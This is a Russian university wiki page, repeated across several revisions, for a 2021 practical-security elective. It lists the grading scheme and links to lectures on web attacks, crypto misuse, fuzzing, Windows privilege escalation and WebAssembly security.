* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды] [https://www.youtube.com/watch?v=oKvppCZkSng видео])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды], [https://youtu.be/p195JmRCvNs видео - часть 1], [https://youtu.be/eGTzK9w1egk видео - часть 2])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды], [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка], [https://www.youtube.com/watch?v=yPmCs39Aodc видео])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни ([https://www.youtube.com/watch?v=dtoUPpVwGIo видео])
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T12:47:13Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]], [https://www.youtube.com/watch?v=movbw--okVQ видео])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([https://www.youtube.com/watch?v=FxVil6DUD4o видео - часть 1], [https://www.youtube.com/watch?v=MrH9tN7tvOw видео - часть 2], [//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды] [https://www.youtube.com/watch?v=9nFQAL06mTE видео])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды] [https://www.youtube.com/watch?v=oKvppCZkSng видео])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды], [https://youtu.be/p195JmRCvNs видео - часть 1], [https://youtu.be/eGTzK9w1egk видео - часть 2])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни ([https://www.youtube.com/watch?v=dtoUPpVwGIo видео])
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T12:47:04Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]], [https://www.youtube.com/watch?v=movbw--okVQ видео])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([https://www.youtube.com/watch?v=FxVil6DUD4o видео - часть 1], [https://www.youtube.com/watch?v=MrH9tN7tvOw видео - часть 2], [//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды] [https://www.youtube.com/watch?v=9nFQAL06mTE видео])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды] [https://www.youtube.com/watch?v=oKvppCZkSng видео])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды], [https://youtu.be/p195JmRCvNs видео - часть 1], [https://youtu.be/eGTzK9w1egk видео - часть 2])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни [https://www.youtube.com/watch?v=dtoUPpVwGIo видео]
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T12:45:54Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]], [https://www.youtube.com/watch?v=movbw--okVQ видео])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([https://www.youtube.com/watch?v=FxVil6DUD4o видео - часть 1], [https://www.youtube.com/watch?v=MrH9tN7tvOw видео - часть 2], [//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды] [https://www.youtube.com/watch?v=9nFQAL06mTE видео])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды] [https://www.youtube.com/watch?v=oKvppCZkSng видео])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды], [https://youtu.be/p195JmRCvNs видео - часть 1], [https://youtu.be/eGTzK9w1egk видео - часть 2])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T12:45:46Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]] [https://www.youtube.com/watch?v=movbw--okVQ видео])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([https://www.youtube.com/watch?v=FxVil6DUD4o видео - часть 1], [https://www.youtube.com/watch?v=MrH9tN7tvOw видео - часть 2], [//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды] [https://www.youtube.com/watch?v=9nFQAL06mTE видео])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды] [https://www.youtube.com/watch?v=oKvppCZkSng видео])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды], [https://youtu.be/p195JmRCvNs видео - часть 1], [https://youtu.be/eGTzK9w1egk видео - часть 2])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T11:43:26Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([https://www.youtube.com/watch?v=FxVil6DUD4o видео - часть 1], [https://www.youtube.com/watch?v=MrH9tN7tvOw видео - часть 2], [//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды] [https://www.youtube.com/watch?v=9nFQAL06mTE видео])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды] [https://www.youtube.com/watch?v=oKvppCZkSng видео])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды], [https://youtu.be/p195JmRCvNs видео - часть 1], [https://youtu.be/eGTzK9w1egk видео - часть 2])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T11:43:06Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
* '''Где''': аудитория 612, 2-й учебный корпус, планета Земля, Млечный Путь.

Курс рекомендуется студентам, интересующимся практической безопасностью. Каждое занятие будет иметь формат воркшопа/семинара - будет практическим, на него надо приходить с ноутбуком, а также установленным софтом.

Оценка за курс будет определяться по результатам выполнения практических заданий. За каждое из заданий будут даваться баллы, сумма баллов и определит оценку. Задания будут делиться на обязательные и бонусные. Баллы за все обязательные задания вместе дадут '''10000'''. Критерии такие:
* '''2000''' и больше будут давать оценку "отлично".
* баллы >= '''1000''', но меньше '''2000''' будут давать оценку "хорошо"
* баллы >= '''500''', но меньше '''1000''' будут давать оценку "удовлетворительно"

Большая часть заданий будет выполнена в формате ctf-тасков<ref>Про CTF и CTF-команду [[Bushwhackers]]</ref>.

== Занятия ==

* '''16.02''' - Веб-безопасность — XXE ([http://xxe.course.secsem.ru/ материалы], [[Дополнительные_главы_практической_безопасности_(2021)/XXE|про эксплуатацию OOB]])
* '''02.03''' - Веб-безопасность — небезопасная десериализация ([https://www.youtube.com/watch?v=FxVil6DUD4o видео - часть 1][https://www.youtube.com/watch?v=MrH9tN7tvOw видео - часть 2][//course.secsem.ru/slides/unserialize_php.pdf слайды по небезопасной десериализации PHP])
* '''09.03''' - Веб-безопасность — template injection ([//course.secsem.ru/slides/2021-ssti-dgpb.pdf слайды] [https://www.youtube.com/watch?v=9nFQAL06mTE видео])
* '''16.03''' - Ошибки неправильного использования криптографии в реальных приложениях ([//course.secsem.ru/slides/dont-roll-your-own-crypto.pdf слайды] [https://www.youtube.com/watch?v=oKvppCZkSng видео])
* '''23.03''' - Система типов в языке программирования Rust ([//course.secsem.ru/slides/2021-course-extended-lec5.pdf слайды] [https://youtu.be/p195JmRCvNs видео - часть 1] [https://youtu.be/eGTzK9w1egk видео - часть 2])
* '''30.03''' - Фаззинг бинарных программ — основы ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:%D0%A4%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3_-_%D0%BE%D1%81%D0%BD%D0%BE%D0%B2%D1%8B.zip слайды] [https://course.secsem.ru/wiki/%D0%94%D0%BE%D0%BF%D0%BE%D0%BB%D0%BD%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5_%D0%B3%D0%BB%D0%B0%D0%B2%D1%8B_%D0%BF%D1%80%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%B9_%D0%B1%D0%B5%D0%B7%D0%BE%D0%BF%D0%B0%D1%81%D0%BD%D0%BE%D1%81%D1%82%D0%B8_(2021)/%D0%94%D0%BE%D0%BC%D0%B0%D1%88%D0%BD%D0%B5%D0%B5_%D0%B7%D0%B0%D0%B4%D0%B0%D0%BD%D0%B8%D0%B5_%D0%BF%D0%BE_%D1%84%D0%B0%D0%B7%D0%B7%D0%B8%D0%BD%D0%B3%D1%83 домашка])
* '''06.04''' - Фаззинг бинарных программ — примеры использования в реальной жизни
* '''13.04''' - Фаззинг бинарных программ — возникающие проблемы и способы их решения на основе специализированных фаззеров и техник: kAFL, Redqueen, Grimoire, etc. ([https://course.secsem.ru/wiki/%D0%A4%D0%B0%D0%B9%D0%BB:Fuzzing3.zip слайды], [https://www.youtube.com/watch?v=KK2z-jCxBwk видео])
* '''20.04''' - Веб-безопасность — атаки на race condition в веб-приложениях ([//course.secsem.ru/slides/race-condition-in-webapps.pdf слайды], [https://www.youtube.com/watch?v=8xQhYRinCus видео])
* '''27.04''' - Эскалация привилегий (LPE) в Windows ([https://course.secsem.ru/slides/LPE-on-Windows.pdf слайды], [https://www.youtube.com/watch?v=PYzuWhXSqSI видео])
* '''11.05''' - '''[дистанционно]''' Внутреннее устройство WebAssembly и некоторые аспекты его безопасности ([https://drive.google.com/file/d/1LWj-u2tC8S-OCV_13MW46yqbnSf_gmU7/view?usp=sharing видео])

== Задания ==

[[Дополнительные_главы_практической_безопасности_(2021)/Задания|Задания находятся на этой странице]]

== Примечания ==
<references/>

Дополнительные главы практической безопасности (2021)

2021-05-25T11:35:29Z

Asterite: /* Занятия */

__NOTOC__
'''Дополнительные главы практической безопасности''' — математический спецкурс по выбору, продолжение курса [[Введение_в_практическую_безопасность_(2019)|Введение в практическую безопасность]] (читавшегося в 2019 году).

* '''Когда''': во вторник, 18:20, 16 февраля 2021
